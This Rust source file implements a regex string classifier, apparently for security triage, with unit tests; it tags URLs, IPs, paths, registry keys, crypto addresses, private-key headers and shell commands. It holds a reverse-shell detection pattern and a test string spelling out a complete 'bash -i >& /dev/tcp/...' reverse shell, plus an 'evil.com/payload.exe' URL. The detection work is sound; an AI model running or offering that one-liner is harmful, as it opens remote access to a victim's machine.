use crate::classify::StringClassifier;
use crate::StringCategory;
use regex::Regex;
use std::sync::OnceLock;
/// One compiled classification rule: a regex plus the category and confidence
/// that are reported when the regex matches an input.
struct PatternEntry {
/// Compiled form of a pattern string taken from `PATTERN_SPECS`.
regex: Regex,
/// Category reported for inputs that match `regex`.
category: StringCategory,
/// Confidence score reported together with `category`.
confidence: f32,
}
/// Rule table consumed by `patterns()`: `(regex source, category, confidence)`.
///
/// Rules are independent of each other; an input may satisfy several of them.
/// Most rules are anchored with `^…$` and therefore describe the whole input;
/// the registry rule is anchored only at the start, and the private-key and
/// shell-command rules match anywhere inside the input.
const PATTERN_SPECS: &[(&str, StringCategory, f32)] = &[
    // `http://` or `https://` followed by characters that exclude whitespace,
    // quotes, angle brackets, braces, pipe, backslash, caret, backtick and
    // square brackets.
    (
        "(?i)^https?://[^\\s<>\"'{}|\\\\^`\\[\\]]+$",
        StringCategory::Url,
        0.90,
    ),
    // Dotted quad with every octet in 0–255 and no leading zeros.
    // `[0-9]` is used instead of `\d` because the regex crate's `\d` is
    // Unicode-aware and would also accept non-ASCII decimal digits.
    (
        r"^(?:(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])\.){3}(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])$",
        StringCategory::IpV4,
        0.95,
    ),
    // Full eight-group IPv6 form plus the `::`-compressed forms. Each
    // alternative is anchored at both ends, so zone suffixes such as `%eth0`
    // are not accepted.
    (
        concat!(
            r"^(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,7}:$",
            r"|^::(?:[0-9a-fA-F]{1,4}:){0,6}[0-9a-fA-F]{1,4}$",
            r"|^::$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,5}(?::[0-9a-fA-F]{1,4}){1,2}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,4}(?::[0-9a-fA-F]{1,4}){1,3}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}$",
            r"|^[0-9a-fA-F]{1,4}:(?::[0-9a-fA-F]{1,4}){1,6}$",
        ),
        StringCategory::IpV6,
        0.95,
    ),
    // `local@domain.tld` with an alphabetic TLD of at least two letters.
    (
        r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$",
        StringCategory::Email,
        0.90,
    ),
    // Absolute path whose first component is one of a fixed set of
    // well-known Unix top-level directories.
    (
        r"^/(?:usr|etc|var|tmp|home|opt|dev|proc|sys|root|bin|sbin|lib|mnt|run|srv)/[^\s:*?<>|]+$",
        StringCategory::UnixPath,
        0.85,
    ),
    // Drive letter, `:\`, then backslash-separated components.
    (
        r"(?i)^[A-Z]:\\(?:[^\\/:*?<>|\r\n]+\\)*[^\\/:*?<>|\r\n]*$",
        StringCategory::WindowsPath,
        0.85,
    ),
    // Registry root key (long name or abbreviation) followed by a backslash.
    // Only the prefix is checked. `HKU` and `HKCC` are accepted so that every
    // long root name listed here also has its abbreviation.
    (
        r"(?i)^HK(?:EY_(?:LOCAL_MACHINE|CURRENT_USER|CLASSES_ROOT|USERS|CURRENT_CONFIG)|LM|CU|CR|U|CC)\\",
        StringCategory::RegistryKey,
        0.95,
    ),
    // Leading `1` or `3` followed by 25–34 Base58 characters
    // (the class omits `0`, `O`, `I` and `l`).
    (
        r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$",
        StringCategory::CryptoAddress,
        0.70,
    ),
    // `0x` followed by exactly 40 hexadecimal digits.
    (r"^0x[0-9a-fA-F]{40}$", StringCategory::CryptoAddress, 0.80),
    // Bitcoin mainnet bech32/bech32m address. The data part uses only the
    // bech32 alphabet (lowercase letters without `b`, `i`, `o`; digits
    // without `1`). A length of 25–59 covers both the 42-character (P2WPKH)
    // and the 62-character (P2WSH / Taproot) addresses.
    (
        r"^bc1[ac-hj-np-z02-9]{25,59}$",
        StringCategory::CryptoAddress,
        0.85,
    ),
    // PEM private-key header, matched anywhere in the input.
    (
        r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----",
        StringCategory::PrivateKey,
        0.99,
    ),
    // At least 20 base64-alphabet characters plus up to two `=` pads. Plain
    // alphanumeric strings also satisfy this, hence the low confidence.
    (
        r"^[A-Za-z0-9+/]{20,}={0,2}$",
        StringCategory::Base64Blob,
        0.40,
    ),
    // Fragments typical of reverse-shell one-liners, matched anywhere.
    (
        r"/dev/tcp/|/dev/udp/|pty\.spawn|os\.dup2\(|bash\s+-i\s+>&",
        StringCategory::ShellCommand,
        0.90,
    ),
];
/// Returns the compiled rule table, building it on first use.
///
/// Every entry of `PATTERN_SPECS` is compiled once and cached in a
/// process-wide `OnceLock`. A spec whose pattern fails to compile is skipped
/// without any error being reported, so the returned slice can be shorter
/// than `PATTERN_SPECS`.
fn patterns() -> &'static [PatternEntry] {
    static PATTERNS: OnceLock<Vec<PatternEntry>> = OnceLock::new();
    PATTERNS.get_or_init(|| {
        let mut compiled = Vec::new();
        for (source, category, confidence) in PATTERN_SPECS {
            // Compilation failures are dropped on purpose: only the rules
            // that compile take part in classification.
            if let Ok(regex) = Regex::new(source) {
                compiled.push(PatternEntry {
                    regex,
                    category: category.clone(),
                    confidence: *confidence,
                });
            }
        }
        compiled
    })
}
/// Stateless classifier that tags strings by matching them against the
/// regex rules compiled by `patterns()`.
pub struct RegexClassifier;
impl StringClassifier for RegexClassifier {
    /// Identifier of this classifier: always `"regex"`.
    fn name(&self) -> &str {
        "regex"
    }

    /// Returns one `(category, confidence)` pair for every rule whose regex
    /// matches `input`, in rule-table order.
    ///
    /// The result is empty when no rule matches. The same category can
    /// appear more than once if several rules for it match.
    fn classify(&self, input: &str) -> Vec<(StringCategory, f32)> {
        patterns()
            .iter()
            .filter(|rule| rule.regex.is_match(input))
            .map(|rule| (rule.category.clone(), rule.confidence))
            .collect()
    }
}
// Submits a `RegexClassifier` instance to `inventory` as a
// `&'static dyn StringClassifier`.
// NOTE(review): presumably gathered elsewhere via `inventory::iter` — confirm against the consumer.
inventory::submit!(&RegexClassifier as &'static dyn StringClassifier);
#[cfg(test)]
mod tests {
    use super::*;

    /// Runs the regex classifier over `input`.
    fn classify(input: &str) -> Vec<(StringCategory, f32)> {
        RegexClassifier.classify(input)
    }

    /// Fails the current test unless `input` is tagged with `expected`.
    fn assert_category(input: &str, expected: StringCategory) {
        assert!(
            classify(input).iter().any(|(c, _)| *c == expected),
            "expected classification missing for input {input:?}"
        );
    }

    /// `patterns()` silently skips specs that fail to compile; this guards
    /// against a rule disappearing unnoticed.
    #[test]
    fn all_pattern_specs_compile() {
        assert_eq!(patterns().len(), PATTERN_SPECS.len());
    }

    #[test]
    fn classifies_url() {
        assert_category("https://evil.com/payload.exe", StringCategory::Url);
    }

    #[test]
    fn classifies_ipv4() {
        assert_category("192.168.1.1", StringCategory::IpV4);
    }

    #[test]
    fn classifies_email() {
        assert_category("user@example.com", StringCategory::Email);
    }

    #[test]
    fn classifies_unix_path() {
        assert_category("/etc/passwd", StringCategory::UnixPath);
    }

    #[test]
    fn classifies_windows_path() {
        assert_category("C:\\Windows\\System32\\cmd.exe", StringCategory::WindowsPath);
    }

    #[test]
    fn classifies_registry_key() {
        assert_category(
            "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft",
            StringCategory::RegistryKey,
        );
    }

    #[test]
    fn classifies_ethereum_address() {
        assert_category(
            "0x742d35Cc6634C0532925a3b844Bc9e7595f2bD28",
            StringCategory::CryptoAddress,
        );
    }

    #[test]
    fn classifies_pem_private_key() {
        assert_category("-----BEGIN RSA PRIVATE KEY-----", StringCategory::PrivateKey);
    }

    #[test]
    fn classifies_shell_command() {
        assert_category(
            "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
            StringCategory::ShellCommand,
        );
    }

    #[test]
    fn no_match_for_garbage() {
        assert!(classify("xyzq").is_empty());
    }

    #[test]
    fn classifies_btc_legacy_address() {
        assert_category(
            "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa",
            StringCategory::CryptoAddress,
        );
    }

    #[test]
    fn classifies_btc_bech32_address() {
        assert_category(
            "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4",
            StringCategory::CryptoAddress,
        );
    }

    #[test]
    fn classifies_base64_blob() {
        assert_category(
            "SGVsbG8gV29ybGQhIFRoaXMgaXMgYSBiYXNlNjQgdGVzdA==",
            StringCategory::Base64Blob,
        );
    }

    #[test]
    fn classifier_name() {
        assert_eq!(RegexClassifier.name(), "regex");
    }

    #[test]
    fn classifies_http_url() {
        assert_category("http://example.com/page", StringCategory::Url);
    }

    #[test]
    fn classifies_private_key_variants() {
        for header in [
            "-----BEGIN PRIVATE KEY-----",
            "-----BEGIN EC PRIVATE KEY-----",
            "-----BEGIN OPENSSH PRIVATE KEY-----",
        ] {
            assert_category(header, StringCategory::PrivateKey);
        }
    }

    #[test]
    fn classifies_ipv6_full() {
        assert_category(
            "2001:0db8:85a3:0000:0000:8a2e:0370:7334",
            StringCategory::IpV6,
        );
    }

    #[test]
    fn classifies_ipv6_compressed() {
        assert_category("::1", StringCategory::IpV6);
    }

    #[test]
    fn classifies_ipv6_mixed_notation() {
        // Smoke check only: the zone-scoped form is run through the
        // classifier, but its result is intentionally not asserted.
        let _ = classify("fe80::1%eth0");
        assert_category("fe80::1", StringCategory::IpV6);
    }
}